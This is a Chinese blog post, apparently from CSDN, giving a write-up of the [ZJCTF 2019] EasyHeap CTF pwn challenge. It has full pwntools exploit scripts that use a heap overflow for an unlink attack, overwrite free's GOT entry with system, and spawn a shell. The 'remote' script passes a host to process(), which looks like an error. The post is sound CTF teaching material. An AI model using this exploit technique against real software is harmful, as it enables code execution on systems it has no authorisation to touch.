[ZJCTF 2019]EasyHeap-patchlibc-调试

最新推荐文章于 2024-01-25 22:37:14 发布
最新推荐文章于 2024-01-25 22:37:14 发布
阅读量550 收藏 1
点赞数
分类专栏: PWN 文章标签: pwn
cctrl
本文链接:https://blog.csdn.net/weixin_44309300/article/details/130309169
版权

1,三连
在这里插入图片描述主要功能:
1、malloc申请chunk
2、修改chunk内容
3、free chunk
4、exit

堆题多看一个libc信息:
在这里插入图片描述

2,IDA分析

2.1、malloc申请chunk
在这里插入图片描述

  • heaparray[i]:存放 chunk 的地址。
  • read_input(heaparray[i], size):向 chunk 写入 size 大小的内容。
  • heaparray是存放在bss段上的(一个全局地址,这很关键)

2.2、修改chunk内容
在这里插入图片描述- read_input(*(&heaparray + v1), v2)向 chunk 中写入 v2(我们可输入控制) 大小的内容,也就是说如果 v2 比 create 时的 size 大的话就会造成堆溢出。

2.3、free chunk

在这里插入图片描述

  • 安全的free chunk,不存在UFA

2.4、找到个system
在这里插入图片描述
思路:unlink利用,PIE保护也没有开启,正好可以修改free的got表.

3,首先针对每个函数写出对应的函数

def add(size,content):
    r.recvuntil("Your choice :")
    r.sendline('1')
    r.recvuntil("Size of Heap : ")
    r.sendline(str(size))
    r.recvuntil("Content of heap:")
    r.sendline(content)

def edit(idx, size, content):
    r.recvuntil("Your choice :")
    r.sendline('2')
    r.recvuntil("Index :")
    r.sendline(str(idx))
    r.recvuntil("Size of Heap : ")
    r.sendline(str(size))
    r.recvuntil("Content of heap : ")
    r.sendline(content)

def delete(idx):
    r.recvuntil("Your choice :")
    r.sendline('3')
    r.recvuntil("Index :")
    r.sendline(str(idx))

获取到堆在BSS段上的地址:heaparray_addr = 0x6020E0

4,不断调试测试payload
首先创建三个chunk:

add(0x90,b"AAAA")	#CHUNK0
add(0x90,b"AAAA")	#CHUNK1
add(0x20,b"/bin/sh\x00")	#CHUNK2

编辑chunk0构造出一个fake_chunk,方便chunk1 free的时候进行合并:

# pre_size + size + fd + bk
fake_chunk = p64(0)+p64(0x91) + p64(heaparray_addr-0x18) + p64(heaparray_addr-0x10)
# mem
fake_chunk = fake_chunk.ljust(0x90,b'A')
# pre_size + size
fake_chunk += p64(0x90) + p64(0xa0)

扩展:
已经patch了libc,但是ld和libc还是得这样分来指定才能顺利替换,奇怪!
如果全都本地指定也不行。
在这里插入图片描述
调试1:
在这里插入图片描述调试2:
在这里插入图片描述unlink前状态:
在这里插入图片描述

调试3:
前面伪造的fd=0x6020C8
在这里插入图片描述调试4:
后面只用关注伪造的fd地址0x6020C8即可,也即是heaparray_addr - 0x18
在这里插入图片描述调试5:
在这里插入图片描述
完整调试payload:

from pwn import *

context.log_level = "debug"

#r = remote("node4.buuoj.cn",27837)
#r = process("./easyheap")

#r = process(["ld-2.23.so","./easyheap"],env={"LD_PRELOAD":"./libc-2.23.so"}) 
r = process(["./easyheap"],env={"LD_PRELOAD":"./libc-2.23.so"}) 

elf = ELF("./easyheap")


def add(size,content):
    r.recvuntil("Your choice :")
    r.sendline('1')
    r.recvuntil("Size of Heap : ")
    r.sendline(str(size))
    r.recvuntil("Content of heap:")
    r.sendline(content)

def edit(idx, size, content):
    r.recvuntil("Your choice :")
    r.sendline('2')
    r.recvuntil("Index :")
    r.sendline(str(idx))
    r.recvuntil("Size of Heap : ")
    r.sendline(str(size))
    r.recvuntil("Content of heap : ")
    r.sendline(content)

def delete(idx):
    r.recvuntil("Your choice :")
    r.sendline('3')
    r.recvuntil("Index :")
    r.sendline(str(idx))

heaparray_addr = 0x6020E0
system_plt = elf.plt['system']
free_got = elf.got['free']

gdb.attach(r)
#gdb.attach(r, '''
#    set follow-fork-mode child
#    b *0x400000+0xC34
#    c
#''')

add(0x90,b"AAA")#0
add(0x90,b"AAA")#1
add(0x20,b"/bin/sh\x00")#2

#pause()#break1
# pre_size + size + fd + bk
fake_chunk = p64(0)+p64(0x91) + p64(heaparray_addr-0x18) + p64(heaparray_addr-0x10)

# mem
fake_chunk = fake_chunk.ljust(0x90,b'A')
# pre_size + size
fake_chunk += p64(0x90) + p64(0xa0)

edit(0,0x100,fake_chunk)
#pause()#break2
#unlink
delete(1)
#pause()#break3

#chunk[3] = arbitray write addr
payload = p64(0)*3 + p64(free_got)
edit(0,0x20,payload)
#pause()#break4
#chunk[0] = plt
edit(0,8,p64(system_plt))
pause()#break5
delete(2)

r.interactive()

pause()调试缺点:注释后每次都得重新执行

复习思路:
heaparray_addr = malloc(chunk0)这里获得的就是&chunk[0];
unlink后
chunk[3] == &chunk[0];
通过修改chunk[3]的值 ->控制 &chunk[0] ->
heaparray_addr的值被修改,本来应该是真正堆上的地址变成了chunk[3] = [任意地址]
heaparray_addr = &chunk[0] == chunk[3] ->实现[任意地址]写

unlink场景特征:
1、存在溢出
2、一个全局指针

目的:
实现任意地址写

解题技巧:
1、伪造chunk[2]=[全局地址-3] ;chunk[3] = [全局地址-2]
(目的:为了实现unlink后,chunk[3] == &chunk[0];)
2、溢出伪造下一个chunk的pre_size和size
3、填入控制任意地址,chunk[3] = [任意地址]
4、给任意地址填入内容,chunk[0] = [任意内容]

5,远程不调试版payload

from pwn import *

context.log_level = "debug"


r = process("node4.buuoj.cn",28444)

elf = ELF("./easyheap")


def add(size,content):
    r.recvuntil("Your choice :")
    r.sendline('1')
    r.recvuntil("Size of Heap : ")
    r.sendline(str(size))
    r.recvuntil("Content of heap:")
    r.sendline(content)

def edit(idx, size, content):
    r.recvuntil("Your choice :")
    r.sendline('2')
    r.recvuntil("Index :")
    r.sendline(str(idx))
    r.recvuntil("Size of Heap : ")
    r.sendline(str(size))
    r.recvuntil("Content of heap : ")
    r.sendline(content)

def delete(idx):
    r.recvuntil("Your choice :")
    r.sendline('3')
    r.recvuntil("Index :")
    r.sendline(str(idx))

heaparray_addr = 0x6020E0
system_plt = elf.plt['system']
free_got = elf.got['free']


add(0x90,b"AAA")#0
add(0x90,b"AAA")#1
add(0x20,b"/bin/sh\x00")#2

# pre_size + size + fd + bk
fake_chunk = p64(0)+p64(0x91) + p64(heaparray_addr-0x18) + p64(heaparray_addr-0x10)

gdb.attach(r)
#gdb.attach(sh,"b* 0x400930")

# mem
fake_chunk = fake_chunk.ljust(0x90,b'A')
# pre_size + size
fake_chunk += p64(0x90) + p64(0xa0)


edit(0,0x100,fake_chunk)
#unlink
delete(1)


#chunk[3] = arbitray write addr
payload = p64(0)*3 + p64(free_got)
edit(0,0x20,payload)
#chunk[0] = plt
delete(2)

r.interactive()
hercu1iz
关注
专栏目录
[ZJCTF 2019]EasyHeap
qq_39869547的博客
01-31 887
常规堆溢出题,存在后门。但是buuctf没有复现环境。所有就用system_plt了。 # -*- coding: utf-8 -*- from PwnContext.core import * binary = './easyheap' debug_libc = './libc-2.23.so' elf = ELF(binary) libc = ELF(debug_libc) local = 1...
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2760
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
heap2-[ZJCTF 2019]EasyHeap
qq_51687381的博客
07-27 201
做题先check找攻击手段,Partial RELRP ->修改got表 菜单题,直接找准delete看看有没有UAF。 UAF未果。 但是在Edit_heap中存在漏洞。 这里看起来是以为可以修改heap的size,其实这个size是用来对你的输入进行限制的。(栈溢出就在这里把size写的很大,方便我们写入) 而且这个程序写的也有点问题。 它会让你修改chunk的信息域 所以 wp from pwn import * sh = remote("node4....
ZJCTF2019EasyHeap
03-27
题目描述 请使用C++实现一个简单的堆,完成以下操作: 1.插入一个元素 2.删除堆顶元素 3.输出堆中元素的个数 4.输出堆中所有元素 ...2.堆中每个节点的值都大于等于其左右子节点的值;...C++ 代码
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门
weixin_45441024的博客
12-27 661
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门 一般的堆题都是这种表单形式的
萌新详解[ZJCTF 2019]EasyHeap,带你走进pwn世界
qq_36495104的博客
05-21 1976
安全保护 IDA查看 main int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [rsp+0h] [rbp-10h] unsigned __int64 v5; // [rsp+8h] [rbp-8h] v5 = __readfsqword(0x28u); setvbuf(stdout, 0LL, 2, 0LL); se
[ZJCTF 2019]EasyHeap-house of spirit
huzai9527的博客
03-15 240
[ZJCTF 2019]EasyHeap-house of spirit 先给出exp,exp中我标明了每一个步骤 每个步骤执行完后,内存中的地址空间我也贴出来了 exp from pwn import * p = remote('node3.buuoj.cn',29012) #p = process('./easyheap') context.log_level = 'debug' def creat(size,content): p.sendlineafter('Your choice :',st
e9patch:强大的静态二进制重写工具
07-24
E9Patch - 强大的静态二进制重写器 E9Patch 是一个强大的静态二进制重写工具,用于x86_64 Linux ELF 二进制文件。 E9补丁是: 可扩展:E9Patch 可以可靠地重写大型/复杂的二进制文件,包括 Web 浏览器(大小超过 100MB)。 兼容:重写的二进制文件是原始文件的直接替代品,没有额外的依赖项。 快速:E9Patch 可以在几秒钟内重写大多数二进制文件。 低开销:性能和内存。 可编程:E9Patch 的设计使其可以轻松集成到其他项目中。 有关详细信息,请参阅和。 背景 静态二进制重写将二进制文件(ELF 可执行文件或共享对象,例如a.out )作为输入,并输出一个新的二进制文件(例如, b.out ),其中应用了一些补丁/修改。 然后可以将修补后的b.out用作原始a.out替代品。 典型的二进制重写应用程序包括检测(添加新指令)或修补(用新版
韩顺平 坦克大战游戏源码
12-26
韩顺平 java视频培训中讲解的游戏,根据视频讲解编写,功能基本齐全。
BUUCTF pwn——[ZJCTF 2019]EasyHeap
CNS-Enterprise BCC-1701-J
05-30 290
BUUCTF 做题练习
buuctf [ZJCTF 2019]EasyHeap
weixin_45677731的博客
08-24 957
这题只有add,edit,delete三个主体部分,没有show的部分 create_heap函数,chunk的指针保存在bss段的heaparray数组处 edit_heap函数,注意这里输入的数据长度是可以自己设置的,就可以随意溢出了 delete_heap函数 除此之外,还有这样一个l33t函数: 在程序中,你只要满足一定的条件,是可以运行这个函数的,我猜测在[ZJCTF 2019]比赛进行的时候可能这个函数是可以利用的,但现在在buu上面是用不了的,flag文件的目录不对。不过,这个sys
BUUCTF-[ZJCTF 2019]EasyHeap1
Rt1Text的博客
09-25 989
经典堆菜单。
pwn入门堆题[ZJCTF 2019]EasyHeap
最新发布
m0_73575406的博客
01-25 606
buuctf上一道简单的堆题wp,希望对新手有帮助(虽然我也只是刚学不久的新手啦QAQ),非常简单的利用方式,比uaf还简单(看wp前建议去wiki了解一下unsortedbin的相关知识)。
pwn】[ZJCTF 2019]EasyHeap --fastbin攻击,house of spirit
question55的博客
12-22 956
/ 往堆中读入数据。
[ZJCTF 2019]EasyHeap的wp
wuyvle的博客
02-25 243
还是堆题的老三样 1. 有个指针 2. edit根据堆块指针表的指针指过去,编辑堆块,,而且竟然还能重新定义可以输入的长度!! 但是堆块大小申请好了就不变了,所以这里可以随意造成堆溢出。 3. 可以用unlink做 from pwn import * sh=remote("node3.buuoj.cn",27337) elf=ELF("./easyheap") free_got=elf.got['free'] system_plt=elf.plt['system'] context.log_level.
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap
Y_peak的博客
11-16 951
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap 思路 我们第一个想法肯定是执行l33t这个函数,事实证明被摆了一道。没有结果, 但是我们有system函数我们可以将其放入我们可以操控的函数,比如printf、puts、gets、free等函数的got表,通过传入/bin/sh来解决。利用uaf就可以达到其目的。 exploit from pwn import * context(os='linux',arch='amd64',log_level='debug') p = remot
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值